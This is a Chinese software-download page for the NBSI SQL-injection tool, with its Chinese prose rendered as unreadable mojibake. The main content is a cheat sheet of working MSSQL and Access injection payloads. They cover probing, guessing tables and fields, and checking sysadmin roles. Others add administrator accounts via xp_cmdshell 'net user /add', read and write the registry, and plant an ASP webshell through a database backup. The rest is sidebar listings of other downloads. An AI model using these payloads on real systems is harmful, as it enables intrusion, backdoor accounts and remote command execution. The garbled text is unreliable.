NBSI×¢È멶´¼ì²â¹¤¾ß

NBSI×¢È멶´¼ì²â¹¤¾ß

NBSI×¢È멶´¼ì²â¹¤¾ß

NBSI×¢È멶´¼ì²â¹¤¾ß

È˹¤¼ì²â£¬°²ÐÄÏÂÔØ
Èí¼þͶËß
·ÖÀà
ϵͳ°²È«
´óС
119MB
ÓïÑÔ
¼òÌåÖÐÎÄ
Èí¼þÊÚȨ
Ãâ·ÑÈí¼þ
ƽ̨
WinAll
¸üÐÂʱ¼ä
2022-11-07

NBSI×¢ÈëÍøվ©¶´É¨ÃèרÓù¤¾ßÊÇÒ»¿î¹¦ÄÜÆëÈ«µÄAPP£¬ÓÉvbÓïÑÔ׫дµÄÍøվ©¶´¼ì²âרÓù¤¾ßµÄÃû×Ö£¬ASP×¢ÈëÍøվ©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚsql server×¢Èë¼ìÑé²ãÃæÓнϸߵÄ׼ȷ¶È¡£

Èí¼þ¼ò½é

1.·Ö±æÊDz»ÊÇÓÐ×¢Èë

;and 1=1

;and 1=2

2.·ÖÎöÅжÏÊDz»ÊÇmssql

;and user0

3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 access

4.×¢ÈëÖ÷Òª²ÎÊýÊDZêʶ·û

and [²éѯÌõ¼þ] and =

5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ

and [²éѯÌõ¼þ] and %=

6.²ÂÊý¾Ý¿â

;and (Select Count(*) from [Êý¾Ý¿âÃû])0

7.²Â×Ö¶Î

;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

8.²Â×Ö¶ÎÖмͼ³¤¶Ì

;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

9.(1)²Â×ֶεÄasciiÖµ£¨access£©

;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

(2)²Â×ֶεÄasciiÖµ£¨mssql£©

;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)½âÎöxmlÎļþĿ¼

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(Éϲ½»ñµÃµÄpaths)))

(2)½âÎöxmlÎļþĿ¼

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯÎĵµµÄƒÈÈÝ

13.mssqlÖеÄsqlÓï¾ä

xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ

xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ

xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ

ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ

xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName ɾµôijһֵ

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ

14.mssqlµÄbackup½¨Á¢webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssqlÄÚǶº¯Êý¹«Ê½

;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢

;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa

;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§

;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â

16.¼òÔ¼µÄwebshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº

http://ip/l.asp?c=dir

ÃÜÂ룺

Ïà¹ØרÌâ
ÃλÃÊÖÓÎË¢½ð±Ò©¶´ 35¿î

¶àÌØÊÖÓÎרÌâΪÄúÌṩÃλÃÊÖÓÎË¢½ð±Ò©¶´,ÃλÃÊÖÓÎתÒÆ100Íò½ð±Ò¡£°²×¿Æ»¹û°æÒ»Ó¦¾ãÈ«,ÕÒ¾­µäÊÖÓξÍÀ´¶àÌØÊÖ»úÓÎϷƵµÀÏÂÔØ!

¿­Èö´óµÛÊÖÓΰ²×¿°æ
¿­Èö´óµÛÊÖÓΰ²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-08
ÎäÁÖÉñ¹¦ÊÖÓΰ²×¿°æ
ÎäÁÖÉñ¹¦ÊÖÓΰ²×¿°æ
¸üÐÂÈÕÆÚ£º2022-10-18
Ãλô«ÆæÊÖÓÎ
Ãλô«ÆæÊÖÓÎ
¸üÐÂÈÕÆÚ£º2022-11-07
ÃλûðÓ°ÊÖÓÎ
ÃλûðÓ°ÊÖÓÎ
¸üÐÂÈÕÆÚ£º2022-11-07
ÃλñøÍÅÊÖÓÎ
ÃλñøÍÅÊÖÓÎ
¸üÐÂÈÕÆÚ£º2022-11-08
ÃλöԾöÊÖÓÎ
ÃλöԾöÊÖÓÎ
¸üÐÂÈÕÆÚ£º2020-12-01
´óÃλÃÊÖÓÎ
´óÃλÃÊÖÓÎ
¸üÐÂÈÕÆÚ£º2020-12-01
ÃλÃÐùÔ¯ÊÖÓÎ
ÃλÃÐùÔ¯ÊÖÓÎ
¸üÐÂÈÕÆÚ£º2022-10-18
ÃλÃÏÉÂÂÊÖÓÎ
ÃλÃÏÉÂÂÊÖÓÎ
¸üÐÂÈÕÆÚ£º2022-10-18
©¶´É¨Ã蹤¾ß 41¿î

©¶´É¨Ã蹤¾ßµÄÖ÷Òª¹¦ÄÜÊÇͨ¹ý¿ª·¢¶Ô±¾µØ¼ÆËã»ú½øÐÐɨÃ裬ͨ¹ý©¶´É¨Ã蹤¾ßÆÀ¹À¼ÆËã»úµÄ½¡¿µ×´¿ö£¬·ÖÎö¼ÆËã»úÖÐÊÇ·ñ´æÔÚ°²È«Â©¶´¡£ÔÚÐí¶àÇé¿öÏ£¬ÎÒÃÇÔÚ©¶´É¨Ãè¹ý³ÌÖÐʹÓ鶴ɨÃ蹤¾ß£¬Í¨¹ýϵͳ²»¶Ï¸üкÍÐÞ¸´Â©¶´£¬Ìá¸ß¼ÆËã»ú°²È«ÐÔ¡£ÏÂÃæµÄ°æ±¾ÎªÄúÕûÀíÁËһЩ©¶´É¨Ã蹤¾ß¡£ÓÐÐèÒªµÄÅóÓÑ¿ÉÒÔÏÂÔز¢Ê¹ÓÃËüÃÇ¡£¶àÌØÈí¼þרÌâΪÄúÌṩ©¶´É¨Ã蹤¾ß,¹«Ë¾Â©¶´É¨Ã蹤¾ß,°²×¿Â©¶´É¨Ã蹤¾ß¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«Èí¼þÏÂÔØ¡£

NBSI×¢È멶´¼ì²â¹¤¾ß
NBSI×¢È멶´¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
DirectShow©¶´×¨ÓÃÐÞ¸´¹¤¾ß
DirectShow©¶´×¨ÓÃÐÞ¸´¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-09
NBSI(Íøվ©¶´¼ì²â¹¤¾ß)
NBSI(Íøվ©¶´¼ì²â¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
360¸ßΣ©¶´ÃâÒß¹¤¾ß
360¸ßΣ©¶´ÃâÒß¹¤¾ß
¸üÐÂÈÕÆÚ£º2020-11-05
win7ϵͳ©¶´É¨ÃèÐÞ¸´¹¤¾ß
win7ϵͳ©¶´É¨ÃèÐÞ¸´¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
³¬¼¶Web©¶´É¨ÃèÆ÷
³¬¼¶Web©¶´É¨ÃèÆ÷
¸üÐÂÈÕÆÚ£º2022-11-07
WebCruiser(Íøվ©¶´É¨Ãè°²×°)
WebCruiser(Íøվ©¶´É¨Ãè°²×°)
¸üÐÂÈÕÆÚ£º2022-08-06
AcuSensor(web©¶´É¨ÃèÈí¼þ)
AcuSensor(web©¶´É¨ÃèÈí¼þ)
¸üÐÂÈÕÆÚ£º2023-04-11
web©¶´É¨ÃèÆ÷
web©¶´É¨ÃèÆ÷
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿â¹¤¾ß 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-19
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-14
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-08-10
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
¸üÐÂÈÕÆÚ£º2022-11-07
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
¸üÐÂÈÕÆÚ£º2022-11-07
©¶´¼ì²â 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩ©¶´¼ì²â,·þÎñÆ÷©¶´¼ì²â,app©¶´¼ì²â¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

EVEREST(Ó²¼þ¼ì²â¹¤¾ß)
EVEREST(Ó²¼þ¼ì²â¹¤¾ß)
¸üÐÂÈÕÆÚ£º2022-11-07
ºÚƬ¼ì²â¹¤¾ß
ºÚƬ¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
URL¼ì²â¹¤¾ß
URL¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-08-15
¼üÅ̼ì²â¹¤¾ß
¼üÅ̼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-08-06
ÃÜÔ¿¼ì²â¹¤¾ß
ÃÜÔ¿¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-08-09
ÏÔ¿¨¼ì²â¹¤¾ß
ÏÔ¿¨¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
¼üÅ̼ì²â¹¤¾ß
¼üÅ̼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2022-11-07
Êý¾Ý¿âÈí¼þ 41¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
ÊÖ»ú¶¨Î»Èí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2023-06-19
Excel°²×¿°²×¿°æ
Excel°²×¿°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿»ÊµÛ°²×¿°æ
°²×¿»ÊµÛ°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-08
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
¸üÐÂÈÕÆÚ£º2022-11-07
Èí¼þÌìÌð²×¿°æ
Èí¼þÌìÌð²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
EGOÈí¼þ°²×¿°æ
EGOÈí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2022-11-07
ÍøÓÑÆÀÂÛ
ÓÑÇéÁ´½Ó
ÎÂÜ°Ìáʾ
ÄúºÃ:
¸ÐлÄúÏÂÔر¾Èí¼þ¡£
ÏÖÑûÇëÄú¹Ø×¢ÎÒÃǵÄ΢ÐŹ«Öںš£
Äú½«»ñÈ¡µ½´ËÈí¼þµÄ°²×°Ê¹Óý̳̼°Èí¼þµÄÏà¹Ø¿Î³Ìѧϰ¡£
ÈçÓÐÒÉÎÊÒ²¿ÉÔÚ΢ÐŹ«ÖÚºÅÖлظ´ÎÊÌ⣬½«»áÓÐÈ˹¤¿Í·þΪÄú½â´ð¡£
ºÃµÄ£¬ÎÒÖªµÀÁË